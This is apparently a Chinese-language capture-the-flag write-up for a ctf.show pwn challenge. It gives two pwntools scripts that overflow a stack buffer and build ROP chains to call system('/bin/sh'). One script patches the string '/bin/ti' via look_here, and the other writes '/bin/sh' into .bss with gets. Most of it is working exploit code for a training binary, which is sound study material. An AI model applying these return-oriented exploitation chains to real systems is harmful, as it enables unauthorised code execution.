0x00 第一种方法

查找二进制中的字符串时,发现了可疑的字符串 /bin/ti:

ROPgadget --binary pwn --string "ti"

得到 ti 所在的地址:

Strings information
============================================================
0x000000000060104d : ti

程序里有一个可以利用的函数 look_here,它会把传入指针指向的前两个字节各做 ascii-1(正好把 ti 变成 sh):

/* Decompiler output for look_here from the challenge binary.
 * Decrements each of the first two bytes at a1 by one ("ti" -> "sh").
 * Returns the pointer value held before the final post-increment, i.e. a1 + 1;
 * the ROP chain below never consumes that return value. */
_BYTE *__fastcall look_here(_BYTE *a1)
{
  _BYTE *result; // rax
  int i; // [rsp+14h] [rbp-4h]

  for ( i = 0; i <= 1; ++i )   // exactly two iterations: a1[0] and a1[1]
  {
    result = a1;
    --*a1++;                   // decrement the byte, then advance the pointer
  }
  return result;
}

exp 如下,链尾调用 system 之前需要加一个 ret 来平衡栈:

from pwn import *
from LibcSearcher import *

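elf = ELF('./pwn')

local = 1
if local == 1:
    io = process('./pwn')
else:
    io = remote('pwn.challenge.ctf.show',28133)

# All addresses below are absolute, so they only hold if the binary is mapped
# at a fixed base (presumably no PIE -- confirm with checksec before relying on it).
system_addr = elf.symbols['system']
pop_rdi_ret = 0x0000000000400733   # gadget the author labels "pop rdi ; ret"
ti = 0x000000000060104d            # the "ti" tail of the "/bin/ti" string
binsh = 0x601048                   # start of "/bin/ti"; reads "/bin/sh" after look_here
lookhere = 0x40062D                # look_here: decrements two bytes at rdi (ascii-1)
ret = 0x00000000004004d1           # lone ret, used to rebalance the stack before system

# Padding must be bytes: p64() returns bytes and str + bytes raises TypeError on
# Python 3 (the original 'a' * 0x2A0 only worked on Python 2); b'a' works on both.
payload = b'a' * 0x2A0                                   # fill up to the presumed saved-rbp slot
payload += p64(0xdeadbeef)                               # saved rbp, value irrelevant
payload += p64(pop_rdi_ret) + p64(ti) + p64(lookhere)    # look_here("ti") -> "sh"
payload += p64(pop_rdi_ret) + p64(binsh)                 # rdi = "/bin/sh"
payload += p64(ret)                                      # stack balancing, see writeup
payload += p64(system_addr)
io.sendline(payload)


io.interactive()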

0x01 第二种方法

不需要使用函数 look_here,因为题目中给了 gets 函数,利用它往可写内存里写一个“/bin/sh”即可。

这里把“/bin/sh”写入 bss 段中,再把它作为 system 的参数:

from pwn import *
from LibcSearcher import *

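elf = ELF('./pwn')

local = 0
if local == 1:
    io = process('./pwn')
    #gdb.attach(io,'b * 0x04006B2')
else:
    io = remote('pwn.challenge.ctf.show',28133)

# Absolute addresses: valid only while the binary is mapped at a fixed base
# (presumably no PIE -- confirm with checksec).
system_addr = elf.symbols['system']
gets_addr = elf.symbols['gets']
bss = 0x00601800                   # writable slot in .bss that will hold "/bin/sh"
ret = 0x00000000004004d1           # lone ret, rebalances the stack before system
pop_rdi_ret = 0x0000000000400733   # gadget the author labels "pop rdi ; ret"

# Padding must be bytes: p64() returns bytes and str + bytes raises TypeError on
# Python 3 (the original 'a' * 0x2A0 only worked on Python 2); b'a' works on both.
payload = b'a' * 0x2A0                                    # fill up to the presumed saved-rbp slot
payload += p64(0xdeadbeef)                                # saved rbp, value irrelevant
payload += p64(pop_rdi_ret) + p64(bss) + p64(gets_addr)   # gets(bss): reads the second line sent below
payload += p64(pop_rdi_ret) + p64(bss)                    # rdi = bss, now "/bin/sh"
payload += p64(ret)                                       # stack balancing, see writeup
payload += p64(system_addr)
io.sendline(payload)
io.sendline(b'/bin/sh')     # consumed by the gets(bss) call in the chain

io.interactive()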